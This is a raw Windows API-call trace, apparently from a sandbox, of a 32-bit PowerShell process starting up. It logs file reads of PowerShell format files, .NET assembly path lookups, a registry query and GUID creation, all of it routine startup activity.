[0050.210] ReadFile (in: hFile=0x328, lpBuffer=0x2f02ba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2f02ba0*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.210] GetLastError () returned 0x0 [0050.211] ReadFile (in: hFile=0x328, lpBuffer=0x2f02ba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2f02ba0*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.211] GetLastError () returned 0x0 [0050.211] ReadFile (in: hFile=0x328, lpBuffer=0x2f02ba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2f02ba0*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.211] GetLastError () returned 0x0 [0050.212] ReadFile (in: hFile=0x328, lpBuffer=0x2f02ba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2f02ba0*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.212] GetLastError () returned 0x0 [0050.212] ReadFile (in: hFile=0x328, lpBuffer=0x2f02ba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2f02ba0*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.212] GetLastError () returned 0x0 [0050.212] ReadFile (in: hFile=0x328, lpBuffer=0x2f02ba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2f02ba0*, lpNumberOfBytesRead=0x19e504*=0xaca, lpOverlapped=0x0) returned 1 [0050.212] GetLastError () returned 0x0 [0050.212] ReadFile (in: hFile=0x328, lpBuffer=0x2f0220a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2f0220a*, lpNumberOfBytesRead=0x19e504*=0x0, lpOverlapped=0x0) returned 1 [0050.212] GetLastError () returned 0x0 [0050.212] ReadFile (in: hFile=0x328, lpBuffer=0x2f02ba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2f02ba0*, lpNumberOfBytesRead=0x19e504*=0x0, lpOverlapped=0x0) returned 1 [0050.212] GetLastError () returned 0x0 [0050.212] CloseHandle (hObject=0x328) returned 1 [0050.213] GetLastError () returned 0x0 [0050.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19e064, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0050.213] GetLastError () returned 0x0 [0050.213] SetErrorMode (uMode=0x1) returned 0x1 [0050.213] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2f23b9c | out: lpFileInformation=0x2f23b9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0050.213] GetLastError () returned 0x0 [0050.213] SetErrorMode (uMode=0x1) returned 0x1 [0050.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0050.213] GetLastError () returned 0x0 [0050.213] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e488 | out: phkResult=0x19e488*=0x328) returned 0x0 [0050.213] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x19e4d0, lpData=0x0, lpcbData=0x19e4cc*=0x0 | out: lpType=0x19e4d0*=0x1, lpData=0x0, lpcbData=0x19e4cc*=0x56) returned 0x0 [0050.213] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x19e4d0, lpData=0x247300, lpcbData=0x19e4cc*=0x56 | out: lpType=0x19e4d0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x19e4cc*=0x56) returned 0x0 [0050.213] RegCloseKey (hKey=0x328) returned 0x0 [0050.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0050.214] GetLastError () returned 0x0 [0050.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19dfc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0050.214] GetLastError () returned 0x0 [0050.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x19dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0050.228] GetLastError () returned 0x0 [0050.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0050.230] GetLastError () returned 0x57 [0050.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x19dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0050.238] GetLastError () returned 0x57 [0050.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.243] GetLastError () returned 0x57 [0050.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x19dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0050.244] GetLastError () returned 0x57 [0050.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x19dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52 [0050.252] GetLastError () returned 0x57 [0050.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x19dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74 [0050.258] GetLastError () returned 0x57 [0050.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x19dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0050.260] GetLastError () returned 0x57 [0050.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x19dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60 [0050.267] GetLastError () returned 0x57 [0050.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x19dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0050.273] GetLastError () returned 0x57 [0050.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x19dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0050.274] GetLastError () returned 0x57 [0050.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x19dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0050.274] GetLastError () returned 0x57 [0050.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x19dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50 [0050.275] GetLastError () returned 0x57 [0050.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x19dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e [0050.276] GetLastError () returned 0x57 [0050.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x19dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c [0050.278] GetLastError () returned 0x57 [0050.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x19dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0050.278] GetLastError () returned 0x57 [0050.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x19dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0050.279] GetLastError () returned 0x57 [0050.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x19dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0050.279] GetLastError () returned 0x57 [0050.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dcf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.279] GetLastError () returned 0x57 [0050.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.279] GetLastError () returned 0x57 [0050.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.279] GetLastError () returned 0x57 [0050.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.279] GetLastError () returned 0x57 [0050.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.279] GetLastError () returned 0x57 [0050.301] VirtualQuery (in: lpAddress=0x19d1e0, lpBuffer=0x19e1e0, dwLength=0x1c | out: lpBuffer=0x19e1e0*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.305] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x3e02a3f5, Data2=0xf002, Data3=0x4f49, Data4=([0]=0x85, [1]=0x6a, [2]=0xbe, [3]=0x1e, [4]=0x47, [5]=0x4e, [6]=0x19, [7]=0xb9))) returned 0x0 [0050.306] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x39d1db4, Data2=0x1869, Data3=0x47bd, Data4=([0]=0x90, [1]=0xa4, [2]=0x9f, [3]=0x44, [4]=0x29, [5]=0x82, [6]=0x15, [7]=0x10))) returned 0x0 [0050.306] VirtualQuery (in: lpAddress=0x19d258, lpBuffer=0x19e258, dwLength=0x1c | out: lpBuffer=0x19e258*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.306] VirtualQuery (in: lpAddress=0x19d258, lpBuffer=0x19e258, dwLength=0x1c | out: lpBuffer=0x19e258*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.307] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xc354523d, Data2=0x3cf2, Data3=0x4f94, Data4=([0]=0x8a, [1]=0xdf, [2]=0x38, [3]=0x59, [4]=0xee, [5]=0xc5, [6]=0xa4, [7]=0x50))) returned 0x0 [0050.311] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x5c6249f1, Data2=0xbe6, Data3=0x4011, Data4=([0]=0xa3, [1]=0x2d, [2]=0xce, [3]=0xba, [4]=0xd, [5]=0xd7, [6]=0x8f, [7]=0xc3))) returned 0x0 [0050.311] VirtualQuery (in: lpAddress=0x19d384, lpBuffer=0x19e384, dwLength=0x1c | out: lpBuffer=0x19e384*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.312] VirtualQuery (in: lpAddress=0x19d230, lpBuffer=0x19e230, dwLength=0x1c | out: lpBuffer=0x19e230*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.312] VirtualQuery (in: lpAddress=0x19d230, lpBuffer=0x19e230, dwLength=0x1c | out: lpBuffer=0x19e230*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.312] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x27daaef5, Data2=0x697b, Data3=0x42ff, Data4=([0]=0x87, [1]=0xce, [2]=0xf7, [3]=0xb7, [4]=0x9, [5]=0xe9, [6]=0xad, [7]=0x33))) returned 0x0 [0050.312] VirtualQuery (in: lpAddress=0x19d384, lpBuffer=0x19e384, dwLength=0x1c | out: lpBuffer=0x19e384*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.312] VirtualQuery (in: lpAddress=0x19d29c, lpBuffer=0x19e29c, dwLength=0x1c | out: lpBuffer=0x19e29c*(BaseAddress=0x19d000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.313] VirtualQuery (in: lpAddress=0x19cf50, lpBuffer=0x19df50, dwLength=0x1c | out: lpBuffer=0x19df50*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.313] VirtualQuery (in: lpAddress=0x19cf50, lpBuffer=0x19df50, dwLength=0x1c | out: lpBuffer=0x19df50*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.313] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xd6878741, Data2=0x6c1f, Data3=0x4642, Data4=([0]=0xba, [1]=0xd3, [2]=0x6b, [3]=0x6b, [4]=0xb5, [5]=0x31, [6]=0x11, [7]=0x6b))) returned 0x0 [0050.313] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xd0c735a0, Data2=0x591e, Data3=0x4eb8, Data4=([0]=0x94, [1]=0xc, [2]=0xb7, [3]=0x38, [4]=0xc6, [5]=0x65, [6]=0xa4, [7]=0x23))) returned 0x0 [0050.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19df9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0050.314] GetLastError () returned 0x57 [0050.314] SetErrorMode (uMode=0x1) returned 0x1 [0050.314] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328 [0050.314] GetLastError () returned 0x0 [0050.314] GetFileType (hFile=0x328) returned 0x1 [0050.314] SetErrorMode (uMode=0x1) returned 0x1 [0050.314] GetFileType (hFile=0x328) returned 0x1 [0050.314] ReadFile (in: hFile=0x328, lpBuffer=0x2f88c9c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2f88c9c*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.316] GetLastError () returned 0x0 [0050.316] ReadFile (in: hFile=0x328, lpBuffer=0x2f88c9c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2f88c9c*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.317] GetLastError () returned 0x0 [0050.317] ReadFile (in: hFile=0x328, lpBuffer=0x2f88c9c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2f88c9c*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.318] GetLastError () returned 0x0 [0050.318] ReadFile (in: hFile=0x328, lpBuffer=0x2f88c9c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2f88c9c*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.318] GetLastError () returned 0x0 [0050.319] ReadFile (in: hFile=0x328, lpBuffer=0x2f88c9c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2f88c9c*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.319] GetLastError () returned 0x0 [0050.319] ReadFile (in: hFile=0x328, lpBuffer=0x2f88c9c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2f88c9c*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.319] GetLastError () returned 0x0 [0050.319] ReadFile (in: hFile=0x328, lpBuffer=0x2f88c9c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2f88c9c*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.319] GetLastError () returned 0x0 [0050.319] ReadFile (in: hFile=0x328, lpBuffer=0x2f88c9c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2f88c9c*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.319] GetLastError () returned 0x0 [0050.320] ReadFile (in: hFile=0x328, lpBuffer=0x2f88c9c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2f88c9c*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.320] GetLastError () returned 0x0 [0050.320] ReadFile (in: hFile=0x328, lpBuffer=0x2f88c9c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2f88c9c*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.320] GetLastError () returned 0x0 [0050.320] ReadFile (in: hFile=0x328, lpBuffer=0x2f88c9c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2f88c9c*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.320] GetLastError () returned 0x0 [0050.321] ReadFile (in: hFile=0x328, lpBuffer=0x2f88c9c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2f88c9c*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.321] GetLastError () returned 0x0 [0050.321] ReadFile (in: hFile=0x328, lpBuffer=0x2f88c9c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2f88c9c*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.321] GetLastError () returned 0x0 [0050.321] ReadFile (in: hFile=0x328, lpBuffer=0x2f88c9c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2f88c9c*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.321] GetLastError () returned 0x0 [0050.321] ReadFile (in: hFile=0x328, lpBuffer=0x2f88c9c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2f88c9c*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.321] GetLastError () returned 0x0 [0050.321] ReadFile (in: hFile=0x328, lpBuffer=0x2f88c9c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2f88c9c*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.321] GetLastError () returned 0x0 [0050.324] ReadFile (in: hFile=0x328, lpBuffer=0x2f88c9c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2f88c9c*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.324] GetLastError () returned 0x0 [0050.324] ReadFile (in: hFile=0x328, lpBuffer=0x2f88c9c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2f88c9c*, lpNumberOfBytesRead=0x19e504*=0xbce, lpOverlapped=0x0) returned 1 [0050.324] GetLastError () returned 0x0 [0050.324] ReadFile (in: hFile=0x328, lpBuffer=0x2f8840a, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2f8840a*, lpNumberOfBytesRead=0x19e504*=0x0, lpOverlapped=0x0) returned 1 